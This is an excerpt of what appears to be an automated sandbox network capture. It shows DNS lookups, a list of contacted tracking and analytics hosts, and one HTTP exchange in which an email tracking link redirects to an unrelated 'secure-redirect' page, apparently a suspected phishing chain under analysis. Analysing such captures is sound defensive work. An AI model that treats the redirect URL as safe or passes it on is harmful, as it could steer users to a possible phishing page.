                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.963023901 CET1.1.1.1192.168.2.170x9eb3No error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.963083982 CET1.1.1.1192.168.2.170x4d19No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.145618916 CET1.1.1.1192.168.2.170x8016No error (0)obseu.powerrobotflower.com3.248.162.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.145618916 CET1.1.1.1192.168.2.170x8016No error (0)obseu.powerrobotflower.com34.251.101.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.145618916 CET1.1.1.1192.168.2.170x8016No error (0)obseu.powerrobotflower.com54.75.69.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.185023069 CET1.1.1.1192.168.2.170xab3fNo error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.185023069 CET1.1.1.1192.168.2.170xab3fNo error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.185023069 CET1.1.1.1192.168.2.170xab3fNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.185023069 CET1.1.1.1192.168.2.170xab3fNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.185575962 CET1.1.1.1192.168.2.170x346eNo error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.185575962 CET1.1.1.1192.168.2.170x346eNo error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.706603050 CET1.1.1.1192.168.2.170xd37eNo error (0)www.linkedin.comcf-afd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.706603050 CET1.1.1.1192.168.2.170xd37eNo error (0)cf-afd.www.linkedin.comwww.linkedin.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.707304955 CET1.1.1.1192.168.2.170xdb66No error (0)www.linkedin.comcf-afd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.707304955 CET1.1.1.1192.168.2.170xdb66No error (0)cf-afd.www.linkedin.comwww.linkedin.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.916418076 CET1.1.1.1192.168.2.170xbb0dNo error (0)w3-reporting-nel.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.916418076 CET1.1.1.1192.168.2.170xbb0dNo error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.916418076 CET1.1.1.1192.168.2.170xbb0dNo error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.916418076 CET1.1.1.1192.168.2.170xbb0dNo error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.916418076 CET1.1.1.1192.168.2.170xbb0dNo error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.916604042 CET1.1.1.1192.168.2.170x3decNo error (0)w3-reporting-nel.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.117687941 CET1.1.1.1192.168.2.170x6c37No error (0)api.segment.io44.234.198.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.117687941 CET1.1.1.1192.168.2.170x6c37No error (0)api.segment.io34.223.74.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.117687941 CET1.1.1.1192.168.2.170x6c37No error (0)api.segment.io35.81.90.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.190814972 CET1.1.1.1192.168.2.170x4b74No error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.190814972 CET1.1.1.1192.168.2.170x4b74No error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.190814972 CET1.1.1.1192.168.2.170x4b74No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.190814972 CET1.1.1.1192.168.2.170x4b74No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.190979004 CET1.1.1.1192.168.2.170x8a64No error (0)www.clarity.msclarity.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.190979004 CET1.1.1.1192.168.2.170x8a64No error (0)clarity.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.276372910 CET1.1.1.1192.168.2.170xf3fdNo error (0)294-tkb-300.mktoresp.com192.28.147.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.443077087 CET1.1.1.1192.168.2.170x850aNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.443077087 CET1.1.1.1192.168.2.170x850aNo error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.443077087 CET1.1.1.1192.168.2.170x850aNo error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.443114996 CET1.1.1.1192.168.2.170x3395No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.443114996 CET1.1.1.1192.168.2.170x3395No error (0)star-mini.c10r.facebook.com157.240.253.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.446963072 CET1.1.1.1192.168.2.170xd74cNo error (0)t.contentsquare.net18.244.18.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.446963072 CET1.1.1.1192.168.2.170xd74cNo error (0)t.contentsquare.net18.244.18.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.446963072 CET1.1.1.1192.168.2.170xd74cNo error (0)t.contentsquare.net18.244.18.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.446963072 CET1.1.1.1192.168.2.170xd74cNo error (0)t.contentsquare.net18.244.18.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.446993113 CET1.1.1.1192.168.2.170x4e87No error (0)rules.quantcount.comd2fashanjl7d9f.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.446993113 CET1.1.1.1192.168.2.170x4e87No error (0)d2fashanjl7d9f.cloudfront.net18.66.102.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.446993113 CET1.1.1.1192.168.2.170x4e87No error (0)d2fashanjl7d9f.cloudfront.net18.66.102.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.446993113 CET1.1.1.1192.168.2.170x4e87No error (0)d2fashanjl7d9f.cloudfront.net18.66.102.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.446993113 CET1.1.1.1192.168.2.170x4e87No error (0)d2fashanjl7d9f.cloudfront.net18.66.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.447910070 CET1.1.1.1192.168.2.170x8131No error (0)rules.quantcount.comd2fashanjl7d9f.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.697459936 CET1.1.1.1192.168.2.170x2d92No error (0)googleads.g.doubleclick.net142.250.186.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.698065996 CET1.1.1.1192.168.2.170x9a9bNo error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.727618933 CET1.1.1.1192.168.2.170x1573No error (0)pixel.quantserve.comglobal.px.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.727618933 CET1.1.1.1192.168.2.170x1573No error (0)global.px.quantserve.com91.228.74.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.727618933 CET1.1.1.1192.168.2.170x1573No error (0)global.px.quantserve.com91.228.74.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.727618933 CET1.1.1.1192.168.2.170x1573No error (0)global.px.quantserve.com91.228.74.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.727618933 CET1.1.1.1192.168.2.170x1573No error (0)global.px.quantserve.com91.228.74.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.728295088 CET1.1.1.1192.168.2.170xd69aNo error (0)pixel.quantserve.comglobal.px.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.023258924 CET1.1.1.1192.168.2.170x33b5No error (0)c.contentsquare.netc.ba.contentsquare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.023258924 CET1.1.1.1192.168.2.170x33b5No error (0)c.ba.contentsquare.net46.137.111.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.023258924 CET1.1.1.1192.168.2.170x33b5No error (0)c.ba.contentsquare.net54.247.108.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.023258924 CET1.1.1.1192.168.2.170x33b5No error (0)c.ba.contentsquare.net34.249.87.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.024421930 CET1.1.1.1192.168.2.170xb52bNo error (0)c.contentsquare.netc.ba.contentsquare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.259061098 CET1.1.1.1192.168.2.170xadf4No error (0)api.segment.io35.160.151.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.259061098 CET1.1.1.1192.168.2.170xadf4No error (0)api.segment.io54.69.251.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.259061098 CET1.1.1.1192.168.2.170xadf4No error (0)api.segment.io35.166.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.545734882 CET1.1.1.1192.168.2.170x4c97No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.545734882 CET1.1.1.1192.168.2.170x4c97No error (0)star-mini.c10r.facebook.com157.240.0.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.545777082 CET1.1.1.1192.168.2.170x6f94No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.545777082 CET1.1.1.1192.168.2.170x6f94No error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.545777082 CET1.1.1.1192.168.2.170x6f94No error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.594888926 CET1.1.1.1192.168.2.170xa9f6No error (0)s.clarity.msclarity-ingest-eus-c-sc.eastus.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.595474005 CET1.1.1.1192.168.2.170x9dacNo error (0)s.clarity.msclarity-ingest-eus-c-sc.eastus.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.154795885 CET1.1.1.1192.168.2.170xdb40No error (0)pixel.quantserve.comglobal.px.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.156439066 CET1.1.1.1192.168.2.170x3c59No error (0)pixel.quantserve.comglobal.px.quantserve.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.156439066 CET1.1.1.1192.168.2.170x3c59No error (0)global.px.quantserve.com91.228.74.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.156439066 CET1.1.1.1192.168.2.170x3c59No error (0)global.px.quantserve.com91.228.74.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.156439066 CET1.1.1.1192.168.2.170x3c59No error (0)global.px.quantserve.com91.228.74.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.156439066 CET1.1.1.1192.168.2.170x3c59No error (0)global.px.quantserve.com91.228.74.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.009500980 CET1.1.1.1192.168.2.170x8262No error (0)heapanalytics.com3.219.22.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.009500980 CET1.1.1.1192.168.2.170x8262No error (0)heapanalytics.com52.70.121.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.009500980 CET1.1.1.1192.168.2.170x8262No error (0)heapanalytics.com3.222.222.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.009500980 CET1.1.1.1192.168.2.170x8262No error (0)heapanalytics.com52.72.139.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.009500980 CET1.1.1.1192.168.2.170x8262No error (0)heapanalytics.com34.199.157.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.009500980 CET1.1.1.1192.168.2.170x8262No error (0)heapanalytics.com3.225.191.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.009500980 CET1.1.1.1192.168.2.170x8262No error (0)heapanalytics.com52.21.71.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.009500980 CET1.1.1.1192.168.2.170x8262No error (0)heapanalytics.com107.21.101.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.733283043 CET1.1.1.1192.168.2.170x3826No error (0)heapanalytics.com52.22.214.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.733283043 CET1.1.1.1192.168.2.170x3826No error (0)heapanalytics.com34.236.107.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.733283043 CET1.1.1.1192.168.2.170x3826No error (0)heapanalytics.com44.205.93.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.733283043 CET1.1.1.1192.168.2.170x3826No error (0)heapanalytics.com3.219.22.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.733283043 CET1.1.1.1192.168.2.170x3826No error (0)heapanalytics.com52.70.121.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.733283043 CET1.1.1.1192.168.2.170x3826No error (0)heapanalytics.com107.21.101.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.733283043 CET1.1.1.1192.168.2.170x3826No error (0)heapanalytics.com52.70.121.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.733283043 CET1.1.1.1192.168.2.170x3826No error (0)heapanalytics.com34.194.61.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.001727104 CET1.1.1.1192.168.2.170x52dNo error (0)c.clarity.msc.msn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.001727104 CET1.1.1.1192.168.2.170x52dNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.003150940 CET1.1.1.1192.168.2.170x4079No error (0)c.clarity.msc.msn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:24.003150940 CET1.1.1.1192.168.2.170x4079No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.121198893 CET1.1.1.1192.168.2.170xbc98No error (0)c.clarity.msc.msn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.121198893 CET1.1.1.1192.168.2.170xbc98No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.121236086 CET1.1.1.1192.168.2.170x4dc9No error (0)c.clarity.msc.msn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.121236086 CET1.1.1.1192.168.2.170x4dc9No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.374250889 CET1.1.1.1192.168.2.170x884cName error (3)www.facebook.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:45.733755112 CET1.1.1.1192.168.2.170xbfb8Name error (3)www.facebook.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.233498096 CET1.1.1.1192.168.2.170x6a3cNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.235136986 CET1.1.1.1192.168.2.170x4e90No error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:16.238677025 CET1.1.1.1192.168.2.170x49b6No error (0)obseu.powerrobotflower.com34.251.101.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:16.238677025 CET1.1.1.1192.168.2.170x49b6No error (0)obseu.powerrobotflower.com54.75.69.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:16.238677025 CET1.1.1.1192.168.2.170x49b6No error (0)obseu.powerrobotflower.com3.248.162.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.626107931 CET1.1.1.1192.168.2.170xdbc6No error (0)obseu.powerrobotflower.com34.251.101.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.626107931 CET1.1.1.1192.168.2.170xdbc6No error (0)obseu.powerrobotflower.com54.75.69.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.626107931 CET1.1.1.1192.168.2.170xdbc6No error (0)obseu.powerrobotflower.com3.248.162.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:19.833767891 CET1.1.1.1192.168.2.170x3454No error (0)b.6sc.cob2.6sc.co.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:19.835643053 CET1.1.1.1192.168.2.170xb037No error (0)b.6sc.cob2.6sc.co.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:21.018954039 CET1.1.1.1192.168.2.170xebeeNo error (0)b.6sc.cob2.6sc.co.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:21.019514084 CET1.1.1.1192.168.2.170x727dNo error (0)b.6sc.cob2.6sc.co.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:26.240856886 CET1.1.1.1192.168.2.170x8b53No error (0)s.clarity.msclarity-ingest-eus-c-sc.eastus.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:26.241841078 CET1.1.1.1192.168.2.170x3510No error (0)s.clarity.msclarity-ingest-eus-c-sc.eastus.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          • r.neurotags.net
                                                                                                                                                                                                                                                                                                                                                                          • login.live.com
                                                                                                                                                                                                                                                                                                                                                                          • slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                          • sepedatua.com
                                                                                                                                                                                                                                                                                                                                                                          • https:
                                                                                                                                                                                                                                                                                                                                                                            • mazans.com
                                                                                                                                                                                                                                                                                                                                                                            • cdn.segment.com
                                                                                                                                                                                                                                                                                                                                                                            • twilio.tt.omtrdc.net
                                                                                                                                                                                                                                                                                                                                                                            • www.google.com
                                                                                                                                                                                                                                                                                                                                                                            • consent.trustarc.com
                                                                                                                                                                                                                                                                                                                                                                            • euob.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                            • secure.adnxs.com
                                                                                                                                                                                                                                                                                                                                                                            • connect.facebook.net
                                                                                                                                                                                                                                                                                                                                                                            • cdn.heapanalytics.com
                                                                                                                                                                                                                                                                                                                                                                            • www.redditstatic.com
                                                                                                                                                                                                                                                                                                                                                                            • jscloud.net
                                                                                                                                                                                                                                                                                                                                                                            • bat.bing.com
                                                                                                                                                                                                                                                                                                                                                                            • secure.quantserve.com
                                                                                                                                                                                                                                                                                                                                                                            • pixel-config.reddit.com
                                                                                                                                                                                                                                                                                                                                                                            • alb.reddit.com
                                                                                                                                                                                                                                                                                                                                                                            • obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                            • td.doubleclick.net
                                                                                                                                                                                                                                                                                                                                                                            • t.contentsquare.net
                                                                                                                                                                                                                                                                                                                                                                            • rules.quantcount.com
                                                                                                                                                                                                                                                                                                                                                                            • www.clarity.ms
                                                                                                                                                                                                                                                                                                                                                                            • googleads.g.doubleclick.net
                                                                                                                                                                                                                                                                                                                                                                            • api.segment.io
                                                                                                                                                                                                                                                                                                                                                                            • www.facebook.com
                                                                                                                                                                                                                                                                                                                                                                            • 294-tkb-300.mktoresp.com
                                                                                                                                                                                                                                                                                                                                                                            • pixel.quantserve.com
                                                                                                                                                                                                                                                                                                                                                                            • c.contentsquare.net
                                                                                                                                                                                                                                                                                                                                                                            • heapanalytics.com
                                                                                                                                                                                                                                                                                                                                                                          • fs.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                          • w3-reporting-nel.reddit.com
                                                                                                                                                                                                                                                                                                                                                                          • evoke-windowsservices-tas.msedge.net
                                                                                                                                                                                                                                                                                                                                                                          • www.bing.com
                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          0192.168.2.174970234.168.114.704436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:28:57 UTC864OUTGET /?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: r.neurotags.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:28:57 UTC313INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:28:57 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: B=9080aa16.626cdd49a2c48; path=/; max-age=630720000; domain=.neurotags.com
                                                                                                                                                                                                                                                                                                                                                                          Location: https://sepedatua.com/158983/secure-redirect
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 1
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:28:57 UTC1INData Raw: 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          1192.168.2.174970640.126.31.73443
